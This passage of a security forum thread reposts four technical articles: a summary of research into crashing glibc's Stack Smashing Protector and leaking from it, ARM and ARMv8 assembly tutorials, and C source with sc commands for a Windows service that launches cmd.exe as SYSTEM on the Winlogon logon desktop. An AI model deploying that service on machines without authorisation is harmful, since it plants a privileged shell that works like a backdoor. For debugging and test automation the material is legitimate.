  5. [h=1]Adventure with Stack Smashing Protector (SSP)[/h] by pi3 Introduction. I was heavily playing with Stack Smashing Protector a few years ago. Some of my research (observation) I decided to publish on phrack magazine but not everything. Two years ago my professional life moved to the Windows environment and unfortunately I didn’t have time to play with UNIX world as much as before. One weekend I decided to reanalyze SSP code again and this write-up is describing a few of my observations I’ve made during the work… … which can be shortly summarized as: Not security related… We can change program’s name (from SSP perspective) via overwriting memory region where pointer to “argv[0]” points to. We can crash Stack Smashing Protector code in many ways: Via corrupting memory region pointed by “__environ” variable. Via setting “LIBC_FATAL_STDERR_” to the edge of valid addresses. Via forcing “alloca()” to fail – e.g. stack exhaustion. There is one more bug which I’m analyzing more comprehensively at point 4. It may indirectly force SSP to crash. It exists in DWARF stack (state) machine which is responsible for gathering information about the stack trace (“__backtrace()”) and prints it. We can slightly control SSP’s execution flow. (Un)Fortunately it doesn’t have any influence for the main execution (what about security?). Following scenarios are possible: Force SSP to open “/dev/tty” Force SSP not to open “/dev/tty” and assign to the “fd” descriptor “STDERR_FILENO” value: #define STDERR_FILENO 2 /* Standard error output. */ Crash SSP via 2b. scenario We can crash indirectly SSP via unwinding algorithm (read-AV or we can be killed by “gcc_unreachable” or “gcc_assert” function) – DWARF stack (state) machine: Somehow security related… We can force SSP to allocate a lot of memory and cause Denial of Service via Resource Exhaustion attack. Theoretical Information leak: Full write-up is available here Best regards, Adam ‘pi3? Zabrocki Sursa: Adventure with Stack Smashing Protector (SSP) : pi3 blogStack cookie information leak. Any kind of information leak File corruption. Simulate FDE object was not found Simulate FDE object was found.
  6. [h=2]Running processes on the Winlogon desktop[/h] Disclaimer: this is a Bad Idea unless you know exactly what you’re doing, why you’re doing it and there are no alternatives. Please use responsibly. There may be circumstances where you’d like to programmatically interact with the Winlogon desktop (the one that houses the LogonUI process responsible for displaying logon tiles and the rest of, well, logon UI). Test automation, seamless VM integration, whatever. It’s not easy though, and for good reasons: Logon desktop created by Winlogon has ACL that only grants access to the SYSTEM account. We need a service to access it. Changing that ACL to allow other accounts is a very bad idea. When a user chooses “Switch user” from the Start Menu or when the system first boots and displays the logon UI, it’s all done in a separate session. If a new user logs on, the Winlogon session is reused for that user’s interactive logon. If there is no new logon (but a user switch or unlocking a locked session for example), the Winlogon session is destroyed. Temporary processes in a Winlogon session after locking/unlocking user session So, our service needs to monitor session changes and act when a Winlogon session is created (and made interactive). The code below demonstrates how you can create a process that runs on the Winlogon desktop and can interact with it. #include <windows.h>#include "log.h" #define SERVICE_NAME TEXT("QTestService") SERVICE_STATUS g_Status; SERVICE_STATUS_HANDLE g_StatusHandle; HANDLE g_ConsoleEvent; DWORD g_TargetSessionId; void ServiceMain(int argc, TCHAR *argv[]); DWORD ControlHandlerEx(DWORD controlCode, DWORD eventType, void *eventData, void *context); WCHAR *g_SessionEventName[] = { L"<invalid>", L"WTS_CONSOLE_CONNECT", L"WTS_CONSOLE_DISCONNECT", L"WTS_REMOTE_CONNECT", L"WTS_REMOTE_DISCONNECT", L"WTS_SESSION_LOGON", L"WTS_SESSION_LOGOFF", L"WTS_SESSION_LOCK", L"WTS_SESSION_UNLOCK", L"WTS_SESSION_REMOTE_CONTROL", L"WTS_SESSION_CREATE", L"WTS_SESSION_TERMINATE" }; // Entry point. int main(int argc, TCHAR *argv[]) { SERVICE_TABLE_ENTRY serviceTable[] = { {SERVICE_NAME, ServiceMain}, {NULL, NULL} }; log_init(NULL, TEXT("qservice")); logf("main: start"); StartServiceCtrlDispatcher(serviceTable); logf("main: end"); } DWORD WINAPI WorkerThread(void *param) { TCHAR *cmdline; PROCESS_INFORMATION pi; STARTUPINFO si; HANDLE newToken; DWORD sessionId; DWORD size; HANDLE currentToken; HANDLE currentProcess = GetCurrentProcess(); cmdline = (TCHAR*) param; // Wait until the interactive session changes (to winlogon console). WaitForSingleObject(g_ConsoleEvent, INFINITE); // Get access token from ourselves. OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, &currentToken); // Session ID is stored in the access token. For services it's normally 0. GetTokenInformation(currentToken, TokenSessionId, &sessionId, sizeof(sessionId), &size); logf("current session: %d", sessionId); // We need to create a primary token for CreateProcessAsUser. if (!DuplicateTokenEx(currentToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &newToken)) { perror("DuplicateToken"); return GetLastError(); } CloseHandle(currentProcess); // g_TargetSessionId is set by SessionChange() handler after a WTS_CONSOLE_CONNECT event. // Its value is the new console session ID. In our case it's the "logon screen". sessionId = g_TargetSessionId; logf("Running process '%s' in session %d", cmdline, sessionId); // Change the session ID in the new access token to the target session ID. // This requires SeTcbPrivilege, but we're running as SYSTEM and have it. if (!SetTokenInformation(newToken, TokenSessionId, &sessionId, sizeof(sessionId))) { perror("SetTokenInformation(TokenSessionId)"); return GetLastError(); } // Create process with the new token. ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); // Don't forget to set the correct desktop. si.lpDesktop = TEXT("WinSta0\\Winlogon"); if (!CreateProcessAsUser(newToken, 0, cmdline, 0, 0, 0, 0, 0, 0, &si, ?)) { perror("CreateProcessAsUser"); return GetLastError(); } return ERROR_SUCCESS; } void ServiceMain(int argc, TCHAR *argv[]) { TCHAR *cmdline = TEXT("cmd.exe"); HANDLE workerHandle; logf("ServiceMain: start"); g_Status.dwServiceType = SERVICE_WIN32; g_Status.dwCurrentState = SERVICE_START_PENDING; // SERVICE_ACCEPT_SESSIONCHANGE allows us to receive session change notifications. g_Status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_SESSIONCHANGE; g_Status.dwWin32ExitCode = 0; g_Status.dwServiceSpecificExitCode = 0; g_Status.dwCheckPoint = 0; g_Status.dwWaitHint = 0; g_StatusHandle = RegisterServiceCtrlHandlerEx(SERVICE_NAME, ControlHandlerEx, NULL); if (g_StatusHandle == 0) { perror("RegisterServiceCtrlHandlerEx"); goto stop; } g_Status.dwCurrentState = SERVICE_RUNNING; SetServiceStatus(g_StatusHandle, &g_Status); // Create trigger event for the worker thread. g_ConsoleEvent = CreateEvent(NULL, FALSE, FALSE, NULL); // Start the worker thread. logf("Starting worker thread"); workerHandle = CreateThread(NULL, 0, WorkerThread, cmdline, 0, NULL); if (!workerHandle) { perror("CreateThread"); goto stop; } // Wait for the worker thread to exit. WaitForSingleObject(workerHandle, INFINITE); stop: logf("exiting"); g_Status.dwCurrentState = SERVICE_STOPPED; g_Status.dwWin32ExitCode = GetLastError(); SetServiceStatus(g_StatusHandle, &g_Status); logf("ServiceMain: end"); return; } void SessionChange(DWORD eventType, WTSSESSION_NOTIFICATION *sn) { if (eventType < RTL_NUMBER_OF(g_SessionEventName)) logf("SessionChange: %s, session ID %d", g_SessionEventName[eventType], sn->dwSessionId); else logf("SessionChange: <unknown event: %d>, session id %d", eventType, sn->dwSessionId); if (eventType == WTS_CONSOLE_CONNECT) { // Store the new session ID for the worker thread and signal the trigger event. g_TargetSessionId = sn->dwSessionId; SetEvent(g_ConsoleEvent); } } DWORD ControlHandlerEx(DWORD control, DWORD eventType, void *eventData, void *context) { switch(control) { case SERVICE_CONTROL_STOP: case SERVICE_CONTROL_SHUTDOWN: g_Status.dwWin32ExitCode = 0; g_Status.dwCurrentState = SERVICE_STOPPED; logf("stopping..."); SetServiceStatus(g_StatusHandle, &g_Status); break; case SERVICE_CONTROL_SESSIONCHANGE: SessionChange(eventType, (WTSSESSION_NOTIFICATION*) eventData); break; default: logf("ControlHandlerEx: code 0x%x, event 0x%x", control, eventType); break; } return ERROR_SUCCESS; } [TABLE=class: easySpoilerTable, align: center] [TR] [/TR] [TR] [TD=class: easySpoilerRow, colspan: 2][/TD] [/TR] [/TABLE] You can install the service using following command (mind the spaces): C:\>sc create QTestService binPath= d:\test\QService.exe type= own start= demand [sC] CreateService SUCCESS Then start it with: sc start QTestService After starting, choose “Switch user” or“Lock” from the Start Menu. You should see a console window on the logon screen. ~ by omeg on January 29, 2014. Sursa: » Running processes on the Winlogon desktop - Spinning mirrors
  7. [h=3]Understanding ARM Assembly Part 1[/h]ntdebug 22 Nov 2013 3:38 PM 10 My name is Marion Cole, and I am a Sr. EE in Microsoft Platforms Serviceability group. You may be wondering why Microsoft support would need to know ARM assembly. Doesn’t Windows only run on x86 and x64 machines? No. Windows has ran on a variety of processors in the past. Those include i860, Alpha, MIPS, Fairchild Clipper, PowerPC, Itanium, SPARC, 286, 386, IA-32, x86, x64, and the newest one is ARM. Most of these processors are antiquated now. The common ones now are IA-32, x86, x64. However Windows has started supporting ARM processors in order to jump into the portable devices arena. You will find them in the Microsoft Surface RT, Windows Phones, and other things in the future I am sure. So you may be saying that these devices are locked, and cannot be debugged. That is true from a live debug perspective, but you can get memory dumps and application dumps from them and those can be debugged. Processor There are limitations on ARM processors that Windows supports. There are 3 System on Chip (SOC) vendors that are supported. nVidia, Texas-Instruments, and Qualcomm. Windows only supports the ARMv7 (Cortex, Scorpion) architecture in ARMv7-A in (Application Profile) mode. This implements a traditional ARM architecture with multiple modes and supporting a Virtual Memory System Architecture (VMSA) based on an MMU. It supports the ARM and Thumb-2 instruction sets which allows for a mixture of 16 (Thumb) and 32 (ARM) bit opcodes. So it will look strange in the assembly. Luckily the debuggers know this and handle it for you. This also helps to shrink the size of the assembly code in memory. The processor also has to have the Optional ISA extensions of VFP (Hardware Floating Point) and NEON (128-bit SIMD Architecture). In order to understand the assembly that you will see you need to understand the processor internals. ARM is a Reduced Instruction Set Computer (RISC) much like some of the previous processors that Windows ran on. It is a 32 bit load/store style processor. It has a “Weakly-ordered” memory model: similar to Alpha and IA64, and it requires specific memory barriers to enforce ordering. In ARM devices these as ISB, DSB, and DMB instructions. Registers The processor has 16 available registers r0 – r15. 0: kd> r r0=00000001 r1=00000000 r2=00000000 r3=00000000 r4=e1820044 r5=e17d0580 r6=00000001 r7=e17f89b9 r8=00000002 r9=00000000 r10=1afc38ec r11=e1263b78 r12=e127813c sp=e1263b20 lr=e16c12c3 pc=e178b6d0 psr=00000173 ----- Thumb r0, r1, r2, r3, and r12 are volatile registers. Volatile registers are scratch registers presumed by the caller to be destroyed across a call. Nonvolatile registers are required to retain their values across a function call and must be saved by the callee if used. On Windows four of these registers have a designated purpose. Those are: PC (r15) – Program Counter (EIP on x86) LR (r14) – Link Register. Used as a return address to the caller. SP (r13) – Stack Pointer (ESP on x86). R11 – Frame Pointer (EBP on x86). CPSR – Current Program Status Register (Flags on x86). In Windbg all but r11 will be labeled appropriately for you. So you may be asking why r11 is not labeled “fp” in the debugger. That is because r11 is only used as a frame pointer when you are calling a non-leaf subroutine. The way it works is this: when a call to a non-leaf subroutine is made, the called subroutine pushes the value of the previous frame pointer (in r11) to the stack (right after the lr) and then r11 is set to point to this location in the stack, so eventually we end up with a linked list of frame pointers in the stack that easily enables the construction of the call stack. The frame pointer is not pushed to the stack in leaf functions. Will discuss leaf functions later. CPSR (Current Program Status Register) Now we need to understand some about the CPSR register. Here is the bit breakdown: [TABLE] [TR] [TD]31 [/TD] [TD]30 [/TD] [TD]29 [/TD] [TD]28 [/TD] [TD]27 [/TD] [TD]26 [/TD] [TD]25 [/TD] [TD]24 [/TD] [TD]23 [/TD] [TD]22 [/TD] [TD]21 [/TD] [TD]20 [/TD] [TD]19 [/TD] [TD]18 [/TD] [TD]17 [/TD] [TD]16 [/TD] [TD]15 [/TD] [TD]14 [/TD] [TD]13 [/TD] [TD]12 [/TD] [TD]11 [/TD] [TD]10 [/TD] [TD]9 [/TD] [TD]8 [/TD] [TD]7 [/TD] [TD]6 [/TD] [TD]5 [/TD] [TD]4 [/TD] [TD]3 [/TD] [TD]2 [/TD] [TD]1 [/TD] [TD]0 [/TD] [/TR] [TR] [TD]N [/TD] [TD]Z [/TD] [TD]C [/TD] [TD]V [/TD] [TD]Q [/TD] [TD=colspan: 2]IT [/TD] [TD]J [/TD] [TD=colspan: 4]Reserved [/TD] [TD=colspan: 4]GE [/TD] [TD=colspan: 6]IT [/TD] [TD]E [/TD] [TD]A [/TD] [TD]I [/TD] [TD]F [/TD] [TD]T [/TD] [TD=colspan: 5]M [/TD] [/TR] [/TABLE] Bits [31:28] – Condition Code Flags N – bit 31 – If this bit is set, the result was negative. If bit is cleared the result was positive or zero. Z – bit 30 – If set this bit indicates the result was zero or values compared were equal. If it is cleared, the value is non-zero or the compared values are not equal. C – bit 29 – If this bit is set the instruction resulted in a carry condition. E.g. Adding two unsigned values resulted in a value too large to be strored. V – bit 28 – If this bit is set then the instruction resulted in an overflow condition. E.g. An overflow of adding two signed values. [*]Instructions variants ending with ‘s’ set the condition codes (mov/movs) [*]E – bit 9 – Endianness (big = 1/Little = 0) [*]T – bit 5 – Set if executing Thumb instructions [*]M – bits [4:0] – CPU Mode (User 10000/Supervisor 10011) So why do I need to know about the CPSR (Current Program Status Register)? You will need to know where some of these bits are due to how some of the assembly instruction affect these flags. Example of this is: ADD will add two registers together, or add an immediate value to a register. However it will not affect the flags. ADDS will do the same as ADD, but it does affect the flags. MOV will allow you to move a value into a register, and a value between registers. This is not like the x86/x64. MOV will not let you read or write to memory. This does not affect the flags. MOVS does the same thing as MOV, but it does affect the flags. I hope you are seeing a trend here. There are instructions that will look the same. However if they end in “S” then you need to know that this will affect the flags. I am not going to list all of those assembly instructions here. Those are already listed in the ARM Architecture Reference Manual ARMv7-A and ARMv7-R edition at ARM Architecture Reference Manual ARMv7-A and ARMv7-R edition. So now we have an idea of what can set the flags. Now we need to understand what the flags are used for. They are mainly used for branching instructions. Here is an example: 003a11d2 429a cmp r2,r3 003a11d4 d104 bne |MyApp!FirstFunc+0x28 (003a11e0)| The first instruction in this code (cmp) compares the value stored in register r2 to the value stored in register r3. This comparison instruction sets or resets the Z flag in the CPSR register. The second instruction is a branch instruction ( with the condition code ne which means that if the result of the previous comparison was that the values are not equal (the CPSR flag Z is zero) then branch to the address MyApp!FirstFunc+0x28 (003a11e0). Otherwise the execution continues. There are a few compare instructions. “cmp” subtracts two register values, sets the flags, and discards the result. “cmn” adds two register values, sets the flags, and discards the results. “tst” does a bit wise AND of two register values, sets the flags, and discards the results. There is even an If Then (it) instruction. I am not going to discuss that one here as I have never seen it in any of the Windows code. So is “bne” the only branch instruction? No. There is a lot of them. Here is a table of things that can be seen beside “b”, and what they check the CPSR register: [TABLE] [TR] [TD]Mnemonic Extension [/TD] [TD]Meaning (Integer) [/TD] [TD]Condition Flags (in CPSR) [/TD] [/TR] [TR] [TD]EQ [/TD] [TD]Equal [/TD] [TD]Z==1 [/TD] [/TR] [TR] [TD]NE [/TD] [TD]Not Equal [/TD] [TD]Z==0 [/TD] [/TR] [TR] [TD]MI [/TD] [TD]Negative (Minus) [/TD] [TD]N==1 [/TD] [/TR] [TR] [TD]PL [/TD] [TD]Positive or Zero (Plus) [/TD] [TD]N==0 [/TD] [/TR] [TR] [TD]HI [/TD] [TD]Unsigned higher [/TD] [TD]C==1 and Z==0 [/TD] [/TR] [TR] [TD]LS [/TD] [TD]Unsigned lower or same [/TD] [TD]C==0 or Z==1 [/TD] [/TR] [TR] [TD]GE [/TD] [TD]Signed greater than or equal [/TD] [TD]N==V [/TD] [/TR] [TR] [TD]LT [/TD] [TD]Signed less than [/TD] [TD]N!=V [/TD] [/TR] [TR] [TD]GT [/TD] [TD]Signed greater than [/TD] [TD]Z==0 and N==V [/TD] [/TR] [TR] [TD]LE [/TD] [TD]Signed less than or equal [/TD] [TD]Z==1 or N!=V [/TD] [/TR] [TR] [TD]VS [/TD] [TD]Overflow [/TD] [TD]V==1 [/TD] [/TR] [TR] [TD]VC [/TD] [TD]No overflow [/TD] [TD]V==0 [/TD] [/TR] [TR] [TD]CS [/TD] [TD]Carry set [/TD] [TD]C==1 [/TD] [/TR] [TR] [TD]CC [/TD] [TD]Carry clear [/TD] [TD]C==0 [/TD] [/TR] [TR] [TD]None (AL) [/TD] [TD]Execute always [/TD] [TD] [/TD] [/TR] [/TABLE] Floating Point Registers As mentioned earlier the processor also has to have the ISA extensions of VFP (Hardware Floating Point) and NEON (128-bit SIMD Architecture). Here is what they are. Floating Point As you can see this is 16 – 64bit regiters (d0-d15) that is overlaid with 32 – 32bit registers (s0-s31). There are varieties of the ARM processor that has 32 – 64bit registers and 64 – 32bit registers. Windows 8 will support both 16 and 32 register variants. You have to be careful when using these, because if you access unaligned floats you may cause an exception. SIMD (NEON) As you can see here the SIMD (NEON) extension adds 16 – 128 bit registers (q0-q15) onto the floating point registers. So if you reference Q0 it is the same as referencing D0-D1 or S0-S1-S2-S3. In part 2 we will discuss how Windows utilizes this processor. Sursa: Understanding ARM Assembly Part 1 - Ntdebugging Blog - Site Home - MSDN Blogs
  8. [h=1]Introduction to ARMv8 64-bit Architecture[/h] April 9, 2014 By PnUic Leave a Comment [h=2]Introduction[/h] The ARM architecture is a Reduced Instruction Set Computer (RISC) architecture, indeed its originally stood for “Acorn RISC Machine” but now stood for “Advanced RISC Machines”. In the last years, ARM processors, with the diffusion of smartphones and tablets, are beginning very popular: mostly this is due to reduced costs, and a more power efficiency compared to other architectures as CISC: Complex Instruction Set Computer (CISC) processors, like the x86, have a rich instruction set capable of doing complex things with a single instruction. Such processors often have significant amounts of internal logic that decode machine instructions to sequences of internal operations (microcode).RISC architectures, in contrast, have a smaller number of more general purpose instructions, that might be executed with significantly fewer transistors, making the silicon cheaper and more power efficient. Like other RISC architectures, ARM cores have a large number of general-purpose registers and many instructions execute in a single cycle. It has simple addressing modes, where all load/store addresses can be determined from register contents and instruction fields. RISC architectures (ARM, Mips, …) peculiarity: The load/store architecture only allows memory to be accessed by load and store operations, and all values for an operation need to be loaded from memory and be present in registers, so operations as “add reg,[address]” are not permitted! Another difference with CISC architectures: when a Branch and Link is called (in Intel arch. is the “call” operation) the return address is stored in a special register and not in the stack. A lack into ARM architecture is the absence of multi-threading support, which is present in many others architectures as: Intel and Mips. Cause of AArch32 (32bit) is most documented: Arm on wiki, Cambridge University – Operation System Development I decided to talk only about AArch64 (64bit). [h=2]Processors:[/h] A short ARM processors list: Classic or Cortext-A: with DSP, Floating Point, TrustZone e Jazelle extensions. ARMv5 e ARM6 (2001) Cortex-M: ARM Thumb®-2 technology which provides excellent code density. With Thumb-2 technology, the Cortex-M processors support a fundamental base of 16-bit Thumb instructions, extended to include more powerful 32-bit instructions. First Multi-core. (2004) Cortex-R: ARMv7 Deeply pipelined micro-architecture,Flexible Multi-Processor Core (MPCore) configurations:Symmetric Multi-Processing (SMP) & Asymmetric Multi-Processing (AMP), LPAE extension. Cortex-A50: ARMv8-A 64bit with load-acquire and store-release features , which are an excellent match for the C++11, C11 and Java memory models. (2011) [h=3]Extensions[/h] With every new version of ARM, there’re new extensions provided, the v8 architecture has these: Jazelle is a Java hardware/software accelerator: “ARM Jazelle DBX (Direct Bytecode eXecution) technology for direct bytecode execution of Java”. On Sofware side: Jazelle MobileVM is a complete JVM which is Multi-tasking, engineered to provide high performance multi-tasking in a very small memory footprint Floating Point: for floating point operations NEON: the ARM SIMD 128 bit (Single instruction, multiple data) engine and DSP the SIMD 32bit engine useful to make linear algebra operations Cryptographic Extension is an extension of the SIMD support and operates on the vector register file. It provides instructions for the acceleration of encryption and decryption to support the following: AES, SHA1, SHA2-256. TrustZone: is a system-wide approach to security for a wide array of client and server computing platforms include payment protection technology, digital rights management, BYOD, and a host of secured enterprise solutions Virtualization Extensions with the Large Physical Address Extension (LPAE) enable the efficient implementation of virtual machine hypervisors for ARM architecture compliant processors. The visualization extensions provide the basis for ARM architecture compliant processors to address the needs of both client and server devices for the partitioning and management of complex software environments into virtual machines. The Large Physical Address extension provides the means for each of the software environments to utilize efficiently the available physical memory when handling large amounts of data [h=2]Architectures[/h] AArch64 the ARMv8-A 64-bit execution state, that uses 31 64-bit general purpose registers (R0-R30), and a 64-bit program counter (PC), stack pointer (SP), and exception link registers(ELR). Provides 32 128-bit registers for SIMD vector and scalar floating-point support (V0-V31). A64 instructions have a fixed length of 32 bits and are always little-endian. AArch32 is the ARMv8-A 32-bit execution state, that uses 13 32-bit general purpose registers (R0-R12), a 32-bit program counter (PC), stack pointer (SP), and link register (LR). Provides 32 64-bit registers for Advanced SIMD vector and scalar floating-point support. AArch32 execution state provides a choice of two instruction sets, A32 (ARM) and T32 (Thumb2). Operation in AArch32 state is compatible with ARMv7-A operation. T32: 16-bit instructions are decompressed transparently to full 32-bit ARM instructions in real time without performance loss.Thumb-2 technology made Thumb a mixed (32- and 16-bit) length instruction set [h=2]Data types[/h] Data types are simply these: Byte: 8 bits. Halfword: 16 bits. Word: 32 bits. Doubleword: 64 bits. Quadword: 128 bits. The architecture also supports the following floating-point data types: Half-precision floating-point formats. Single-precision floating-point format. Double-precision floating-point format. In this short guide, I don’t talk about floating point assembly instructions to don’t make it too long, if you want know more about, you can see the ARM Architecture Reference Manual. [h=2]Exception levels[/h] There’re four exception levels, which replaces the 8 different processor modes, they work as the ring in Intel architectures, they are a form of privilege hierarchy: EL0 is the least privileged level, indeed it is called unprivileged execution. Apps are runned here. EL1: here can be runned OS kernel EL2: provides support for virtualization of Non-secure operation. Hypervisor can runned here. EL3 provides support for switching between two Security states, Secure state and Non-secure state. Secure monitor can be runned here. When executing in AArch64 state, execution can move between Exception levels only on taking an exception or on returning from an exception. Each of the 4 privilege levels has 3 private banked registers: the Exception Link Register, Stack Pointer and Saved PSR. [h=3]Interprocessing: AArch64 <=> AArch32[/h] Interprocessing is the term used to describe moving between the AArch64 and AArch32 Execution states. The Execution state can change only on a change of Exception level. This means that the Execution state can change only on taking an exception to a higher Exception level, or returning from an exception to a lower Exception level. On taking an exception to a higher Exception level, the Execution state either: Remains unchanged. Changes from AArch32 state to AArch64 state. On returning from an exception to a lower Exception level, the Execution state either: Remains unchanged. Changes from AArch64 state to AArch32 state. [h=2]The A64 Register[/h] A64 has 31 general-purpose registers (integer) more the zero register and the current stack pointer register, here all the registers: [TABLE] [TR] [TD]Wn[/TD] [TD]32 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR] [TR] [TD]Xn[/TD] [TD]64 bits[/TD] [TD]General-purpose register: n can be 0-30[/TD] [/TR] [TR] [TD]WZR[/TD] [TD]32 bits[/TD] [TD]Zero register[/TD] [/TR] [TR] [TD]XZR[/TD] [TD]64 bits[/TD] [TD]Zero register[/TD] [/TR] [TR] [TD]WSP[/TD] [TD]32 bits[/TD] [TD]Current stack pointer[/TD] [/TR] [TR] [TD]SP[/TD] [TD]64 bits[/TD] [TD]Current stack pointer[/TD] [/TR] [/TABLE] How registers should be using by compilers and programmers: r30 (LR): The Link Register, is used as the subroutine link register (LR) and stores the return address when Branch with Link operations are performed. r29 (FP): The Frame Pointer r19…r28: Callee-saved registers r18: The Platform Register, if needed; otherwise a temporary register. r17 (IP1): The second intra-procedure-call temporary register (can be used by call veneers and PLT code); at other times may be used as a temporary register. r16 (IP0): The first intra-procedure-call scratch register (can be used by call veneers and PLT code); at other times may be used as a temporary register. r9…r15: Temporary registers r8: Indirect result location register r0…r7: Parameter/result registers The PC (program counter) has a limited access, only few instructions, as BL and ADL, can modify it. [h=2]The use of Stack[/h] The stack implementation is full-descending: in a push the stack pointer is decremented, i.e the stack grows towards lower address. Another features is that stack must be quad-word aligned: SP mod 16 = 0. A64 instructions can use the stack pointer only in a limited number of cases: Load/Store instructions use the current stack pointer as the base address: When stack alignment checking is enabled by system software and the base register is SP, the current stack pointer must be initially quadword aligned, That is, it must be aligned to 16 bytes. Misalignment generates a Stack Alignment fault. Add and subtract data processing instructions in their immediate and extended register forms, use the current stack pointer as a source register or the destination register or both. Logical data processing instructions in their immediate form use the current stack pointer as the destination register. [h=2]Process State[/h] PSTATE (process state, CPSR on AArch32) holds process state related information, his flags will be change with compare instructions, for example, so it is used by processor to see if make a branch (jump in Intel terminology) or not. [TABLE] [TR] [TD]N, Z, C, V, D, A, I, F, SS, IL, EL, nRW, SP, Q, GE, IT, J, T, E, M[/TD] [TD]Negative condition flag Zero condition flag Carry condition flag oVerflow condition flag Debug mask bit [AArch64 only] Asynchronous abort mask bit IRQ mask bit FIQ mask bit Software step bit Illegal execution state bit Exception Level (see above) not Register Width: 0=64, 1=32 Stack pointer select: 0=SP0, 1=SPx [AArch32 only] Cumulative saturation flag [AArch32 only] Greater than or Equal flags [AArch32 only] If-then execution state bits [AArch32 only] J execution state bit [AArch32 only] T32 execution state bit [AArch632 only] Endian execution state bit [AArch32 only] Mode field (see above) [AArch32 only][/TD] [/TR] [/TABLE] The first four flags are the Condition flags (NZCV), and they are the mostly used by processors: N: Negative condition flag. If the result is regarded as a two’s complement signed integer, then the PE sets N to 1 if the result is negative, and sets N to 0 if it is positive or zero. Z: Zero condition flag. Set to 1 if the result of the instruction is zero, and to 0 otherwise. A result of zero often indicates an equal result from a comparison. C: Carry condition flag. Set to 1 if the instruction results in a carry condition, for example an unsigned overflow that is the result of an addition. V: Overflow condition flag. Set to 1 if the instruction results in an overflow condition, for example a signed overflow that is the result of an addition [h=2]Condition code suffixes[/h] This suffixes are used by the Branch conditionally instruction, here a table useful to understand what they mean: [TABLE] [TR] [TH]Suffix[/TH] [TH]Flags[/TH] [TH]Meaning[/TH] [/TR] [TR] [TD]EQ[/TD] [TD]Z set[/TD] [TD]Equal[/TD] [/TR] [TR] [TD]NE[/TD] [TD]Z clear[/TD] [TD]Not equal[/TD] [/TR] [TR] [TD]CS or HS[/TD] [TD]C set[/TD] [TD]Higher or same (unsigned >= )[/TD] [/TR] [TR] [TD]CC or LO[/TD] [TD]C clear[/TD] [TD]Lower (unsigned < )[/TD] [/TR] [TR] [TD]MI[/TD] [TD]N set[/TD] [TD]Negative[/TD] [/TR] [TR] [TD]PL[/TD] [TD]N clear[/TD] [TD]Positive or zero[/TD] [/TR] [TR] [TD]VS[/TD] [TD]V set[/TD] [TD]Overflow[/TD] [/TR] [TR] [TD]VC[/TD] [TD]V clear[/TD] [TD]No overflow[/TD] [/TR] [TR] [TD]HI[/TD] [TD]C set and Z clear[/TD] [TD]Higher (unsigned >)[/TD] [/TR] [TR] [TD]LS[/TD] [TD]C clear or Z set[/TD] [TD]Lower or same (unsigned <=)[/TD] [/TR] [TR] [TD]GE[/TD] [TD]N and V the same[/TD] [TD]Signed >=[/TD] [/TR] [TR] [TD]LT[/TD] [TD]N and V differ[/TD] [TD]Signed <[/TD] [/TR] [TR] [TD]GT[/TD] [TD]Z clear, N and V the same[/TD] [TD]Signed >[/TD] [/TR] [TR] [TD]LE[/TD] [TD]Z set, N and V differ[/TD] [TD]Signed <=[/TD] [/TR] [TR] [TD]AL[/TD] [TD]Any[/TD] [TD]Always. This suffix is normally omitted.[/TD] [/TR] [/TABLE] when you see <cond> near an assembly instruction you can use one of these suffixes. [h=2]Istruction Set[/h] The A64 encoding structure breaks down into the following functional groups: A miscellaneous group of branch instructions, exception generating instructions, and system instructions. Data processing instructions associated with general-purpose registers. These instructions are supported by two functional groups, depending on whether the operands: Are all held in registers. Include an operand with a constant immediate value. [*]Load and store instructions associated with the general-purpose register file and the SIMD and floating-point register file. [*]SIMD and scalar floating-point data processing instructions that operate on the SIMD and floating-point registers. (I don’t debate) [h=3]What instructions are not present compared to AArch32:[/h] Conditional execution operations, cause of: The A64 instruction set does not include the concept of predicated or conditional execution. Benchmarking shows that modern branch predictors work well enough that predicated execution of instructions does not offer sufficient benefit to justify its significant use of opcode space, and its implementation cost in advanced implementations. [source] Load Multiple. instructions load from memory a subset, or possibly all, of the general-purpose registers and the PC, so there aren’t: push, pop, ldmia, ecc… : these are be replace by load/store pair. Coprocessor instructions [h=3]Branches & Exception[/h] Conditional branch Conditional branches change the flow of execution depending on the current state of the condition flags or the value in a general-purpose register. [TABLE] [TR] [TD]B<cond>[/TD] [TD]Branch conditionally[/TD] [TD]B.<cond> <label>[/TD] [/TR] [TR] [TD]CBNZ[/TD] [TD]Compare and branch if nonzero[/TD] [TD]CBNZ <Wt|Xt>, <label>[/TD] [/TR] [TR] [TD]CBZ[/TD] [TD]Compare and branch if zero[/TD] [TD]CBZ <Xt>, <label>[/TD] [/TR] [/TABLE] Unconditional branch [TABLE] [TR] [TD]B[/TD] [TD]Branch unconditionally[/TD] [TD]B <label>[/TD] [/TR] [TR] [TD]BL[/TD] [TD]Branch with link[/TD] [TD]BL <label>[/TD] [/TR] [/TABLE] The BL instruction(s) writes the address of the sequentially following instruction, for the return (see RET), to general-purpose register, X30. Unconditional branch (register) [TABLE] [TR] [TD]BLR[/TD] [TD]Branch with link to register[/TD] [TD]BLR <Xn>[/TD] [/TR] [TR] [TD]BR[/TD] [TD]Branch to register[/TD] [TD]BR <Xn>[/TD] [/TR] [TR] [TD]RET[/TD] [TD]Return from subroutine:[/TD] [TD]RET {<Xn>}; where Xn register holding the address to be branched to. Defaults to X30 if absent.[/TD] [/TR] [/TABLE] Exception generating HVC Generate exception targeting Exception level 2 SMC Generate exception targeting Exception level 3 SVC Instruction Generate exception targeting Exception level 1 Others instrunctions NOP: No OPeration WFE Wait for event WFI Wait for interrupt SEV Send event SEVL Send event local [h=3]Load/Store register[/h] There’re many instructions in this class to move many data size: byte, halfword and word, but I show only four, just to make you understand them : two for move single register and two for move a pair of registers; but first I have to describe how we can access to memory. [h=4]Load/Store addressing modes[/h] This part is very important to understand different ARM addressing modes; the most used are three: [base{, #imm}]: Base plus offset addressing means that the address is the value in the 64-bit base register plus an offset. Example: ldrsw x0, [x29,76] #load signed word in x0 [*][base, #imm]! : Pre-indexed addressing means that the address is the sum of the value in the 64-bit base register and an offset, and the address is then writtenback to the base register. Example: stp x29, x30, [sp, -80]! #store x9 e x30 into stack from sp-80 [*][base], #imm : Post-indexed addressing means that the address is the value in the 64-bit base register, and the sum of the address and the offset is then written back to the base register. Example: ldp 